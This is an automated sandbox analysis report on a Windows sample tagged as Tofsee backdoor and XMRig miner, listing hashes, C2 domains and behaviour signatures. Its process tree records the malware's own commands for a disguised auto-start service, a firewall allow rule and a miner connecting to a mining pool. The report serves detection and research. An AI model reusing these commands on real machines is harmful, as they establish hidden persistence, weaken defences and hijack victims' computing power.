Overview

overview

10

Static

static

3

NEAS.358cd...JC.exe

windows7-x64

10

NEAS.358cd...JC.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    142s
  • max time network
    154s
  • platform
    windows7_x64
  • resource
    win7-20231020-en
  • resource tags

    arch:x64arch:x86image:win7-20231020-enlocale:en-usos:windows7-x64system
  • submitted
    23/10/2023, 16:48

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    NEAS.358cd94b404d08274eb01e5466ef12cb8ddeb4ef8524d7cb501077503aac6911exe_JC.exe

  • Size

    179KB

  • MD5

    2722b0312c2e8cb299647d97225c17e6

  • SHA1

    0961bbbb6a87e68c97db29e57a878c0204029bcd

  • SHA256

    358cd94b404d08274eb01e5466ef12cb8ddeb4ef8524d7cb501077503aac6911

  • SHA512

    6f84a11c8d2441168f9ece41e5b7acf226a7e5b8cf2b6b7865a9055bf6e934a09c2fd90b662421f4d7f48bdcf9653e2dd8ce60afcbbd0a318273f9bf3af75dfb

  • SSDEEP

    3072:Z1yBN6fur6AIscrbx+MkJa9ripeH7ewpNnrvIl6QuwNMPGROY0eQX:Zw7+AIprbwMFrbewnjC6Q0PqN

Score
10/10
tofseexmrigevasionminerpersistencetrojan

Malware Config

Extracted

Family

tofsee

C2

vanaheim.cn

jotunheim.name

Signatures

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

    trojantofsee
  • Windows security bypass 2 TTPs 1 IoCs
    evasiontrojan
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • XMRig Miner payload 8 IoCs
    miner
  • Creates new service(s) 1 TTPs
    persistence
  • Modifies Windows Firewall 1 TTPs 1 IoCs
    evasion
  • Sets service image path in registry 2 TTPs 1 IoCs
    persistence
  • Deletes itself 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Launches sc.exe 3 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies data under HKEY_USERS 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 36 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\NEAS.358cd94b404d08274eb01e5466ef12cb8ddeb4ef8524d7cb501077503aac6911exe_JC.exe
    "C:\Users\Admin\AppData\Local\Temp\NEAS.358cd94b404d08274eb01e5466ef12cb8ddeb4ef8524d7cb501077503aac6911exe_JC.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2204
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\iyynsmp\
      2⤵
        PID:1704
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\ombjcsnj.exe" C:\Windows\SysWOW64\iyynsmp\
        2⤵
          PID:2368
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create iyynsmp binPath= "C:\Windows\SysWOW64\iyynsmp\ombjcsnj.exe /d\"C:\Users\Admin\AppData\Local\Temp\NEAS.358cd94b404d08274eb01e5466ef12cb8ddeb4ef8524d7cb501077503aac6911exe_JC.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
          • Launches sc.exe
          PID:2424
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" description iyynsmp "wifi internet conection"
          2⤵
          • Launches sc.exe
          PID:2664
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" start iyynsmp
          2⤵
          • Launches sc.exe
          PID:2748
        • C:\Windows\SysWOW64\netsh.exe
          "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
          2⤵
          • Modifies Windows Firewall
          PID:2676
      • C:\Windows\SysWOW64\iyynsmp\ombjcsnj.exe
        C:\Windows\SysWOW64\iyynsmp\ombjcsnj.exe /d"C:\Users\Admin\AppData\Local\Temp\NEAS.358cd94b404d08274eb01e5466ef12cb8ddeb4ef8524d7cb501077503aac6911exe_JC.exe"
        1⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:2760
        • C:\Windows\SysWOW64\svchost.exe
          svchost.exe
          2⤵
          • Windows security bypass
          • Sets service image path in registry
          • Deletes itself
          • Drops file in System32 directory
          • Suspicious use of SetThreadContext
          • Modifies data under HKEY_USERS
          • Suspicious use of WriteProcessMemory
          PID:2848
          • C:\Windows\SysWOW64\svchost.exe
            svchost.exe -o fastpool.xyz:10060 -u 9mLwUkiK8Yp89zQQYodWKN29jVVVz1cWDFZctWxge16Zi3TpHnSBnnVcCDhSRXdesnMBdVjtDwh1N71KD9z37EzgKSM1tmS.200000 -p x -k -a cn/half --cpu-priority 1
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2336

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\ombjcsnj.exe
        Filesize

        12.8MB

        MD5

        467051dc36a01f0a41e5fe8d3e871f4e

        SHA1

        ed96c4b83ca8080c1976ba0bb0e33eedbfa3620b

        SHA256

        7326da8ecd88a59f286c621f506b5322ea5bc1c511a2a54468993f05f5cda481

        SHA512

        5d00f9136954d4b6caf2ab296bb8dc55e31600389bde613a9322cb2ab75b199058a06111efb2be62aabb6d9127f959038eed674fd21935cd37413b96b70b5a50

        Download Submit

      • C:\Windows\SysWOW64\iyynsmp\ombjcsnj.exe
        Filesize

        12.8MB

        MD5

        467051dc36a01f0a41e5fe8d3e871f4e

        SHA1

        ed96c4b83ca8080c1976ba0bb0e33eedbfa3620b

        SHA256

        7326da8ecd88a59f286c621f506b5322ea5bc1c511a2a54468993f05f5cda481

        SHA512

        5d00f9136954d4b6caf2ab296bb8dc55e31600389bde613a9322cb2ab75b199058a06111efb2be62aabb6d9127f959038eed674fd21935cd37413b96b70b5a50

        Download Submit

      • memory/2204-1-0x0000000000930000-0x0000000000A30000-memory.dmp

        Filesize

        1024KB

        Download

      • memory/2204-2-0x0000000000220000-0x0000000000233000-memory.dmp

        Filesize

        76KB

        Download

      • memory/2204-4-0x0000000000400000-0x00000000007B6000-memory.dmp

        Filesize

        3.7MB

        Download

      • memory/2204-6-0x0000000000400000-0x00000000007B6000-memory.dmp

        Filesize

        3.7MB

        Download

      • memory/2204-7-0x0000000000220000-0x0000000000233000-memory.dmp

        Filesize

        76KB

        Download

      • memory/2336-73-0x0000000000110000-0x0000000000201000-memory.dmp

        Filesize

        964KB

        Download

      • memory/2336-78-0x0000000000110000-0x0000000000201000-memory.dmp

        Filesize

        964KB

        Download

      • memory/2336-76-0x0000000000110000-0x0000000000201000-memory.dmp

        Filesize

        964KB

        Download

      • memory/2336-77-0x0000000000110000-0x0000000000201000-memory.dmp

        Filesize

        964KB

        Download

      • memory/2336-75-0x0000000000110000-0x0000000000201000-memory.dmp

        Filesize

        964KB

        Download

      • memory/2336-64-0x0000000000110000-0x0000000000201000-memory.dmp

        Filesize

        964KB

        Download

      • memory/2336-74-0x0000000000110000-0x0000000000201000-memory.dmp

        Filesize

        964KB

        Download

      • memory/2336-72-0x0000000000110000-0x0000000000201000-memory.dmp

        Filesize

        964KB

        Download

      • memory/2336-68-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2336-63-0x0000000000110000-0x0000000000201000-memory.dmp

        Filesize

        964KB

        Download

      • memory/2760-10-0x0000000000920000-0x0000000000A20000-memory.dmp

        Filesize

        1024KB

        Download

      • memory/2760-11-0x0000000000400000-0x00000000007B6000-memory.dmp

        Filesize

        3.7MB

        Download

      • memory/2760-17-0x0000000000400000-0x00000000007B6000-memory.dmp

        Filesize

        3.7MB

        Download

      • memory/2848-38-0x0000000000160000-0x0000000000170000-memory.dmp

        Filesize

        64KB

        Download

      • memory/2848-49-0x0000000000160000-0x0000000000170000-memory.dmp

        Filesize

        64KB

        Download

      • memory/2848-34-0x0000000000160000-0x0000000000170000-memory.dmp

        Filesize

        64KB

        Download

      • memory/2848-35-0x0000000000160000-0x0000000000170000-memory.dmp

        Filesize

        64KB

        Download

      • memory/2848-36-0x0000000000160000-0x0000000000170000-memory.dmp

        Filesize

        64KB

        Download

      • memory/2848-37-0x0000000000160000-0x0000000000170000-memory.dmp

        Filesize

        64KB

        Download

      • memory/2848-28-0x0000000000150000-0x0000000000156000-memory.dmp

        Filesize

        24KB

        Download

      • memory/2848-39-0x0000000000160000-0x0000000000170000-memory.dmp

        Filesize

        64KB

        Download

      • memory/2848-40-0x0000000000160000-0x0000000000170000-memory.dmp

        Filesize

        64KB

        Download

      • memory/2848-41-0x0000000000160000-0x0000000000170000-memory.dmp

        Filesize

        64KB

        Download

      • memory/2848-42-0x0000000000160000-0x0000000000170000-memory.dmp

        Filesize

        64KB

        Download

      • memory/2848-43-0x0000000000160000-0x0000000000170000-memory.dmp

        Filesize

        64KB

        Download

      • memory/2848-44-0x0000000000160000-0x0000000000170000-memory.dmp

        Filesize

        64KB

        Download

      • memory/2848-45-0x0000000000160000-0x0000000000170000-memory.dmp

        Filesize

        64KB

        Download

      • memory/2848-46-0x0000000000160000-0x0000000000170000-memory.dmp

        Filesize

        64KB

        Download

      • memory/2848-47-0x0000000000160000-0x0000000000170000-memory.dmp

        Filesize

        64KB

        Download

      • memory/2848-48-0x0000000000160000-0x0000000000170000-memory.dmp

        Filesize

        64KB

        Download

      • memory/2848-31-0x0000000000160000-0x0000000000170000-memory.dmp

        Filesize

        64KB

        Download

      • memory/2848-50-0x0000000000160000-0x0000000000170000-memory.dmp

        Filesize

        64KB

        Download

      • memory/2848-51-0x0000000000170000-0x0000000000175000-memory.dmp

        Filesize

        20KB

        Download

      • memory/2848-54-0x0000000000170000-0x0000000000175000-memory.dmp

        Filesize

        20KB

        Download

      • memory/2848-55-0x00000000055E0000-0x00000000059EB000-memory.dmp

        Filesize

        4.0MB

        Download

      • memory/2848-58-0x00000000055E0000-0x00000000059EB000-memory.dmp

        Filesize

        4.0MB

        Download

      • memory/2848-27-0x0000000001880000-0x0000000001A8F000-memory.dmp

        Filesize

        2.1MB

        Download

      • memory/2848-24-0x0000000001880000-0x0000000001A8F000-memory.dmp

        Filesize

        2.1MB

        Download

      • memory/2848-23-0x0000000000080000-0x0000000000095000-memory.dmp

        Filesize

        84KB

        Download

      • memory/2848-21-0x0000000000080000-0x0000000000095000-memory.dmp

        Filesize

        84KB

        Download

      • memory/2848-19-0x0000000000080000-0x0000000000095000-memory.dmp

        Filesize

        84KB

        Download

      • memory/2848-20-0x0000000000080000-0x0000000000095000-memory.dmp

        Filesize

        84KB

        Download

      • memory/2848-15-0x0000000000080000-0x0000000000095000-memory.dmp

        Filesize

        84KB

        Download

      • memory/2848-12-0x0000000000080000-0x0000000000095000-memory.dmp

        Filesize

        84KB

        Download

      • memory/2848-13-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2848-59-0x0000000000180000-0x0000000000187000-memory.dmp

        Filesize

        28KB

        Download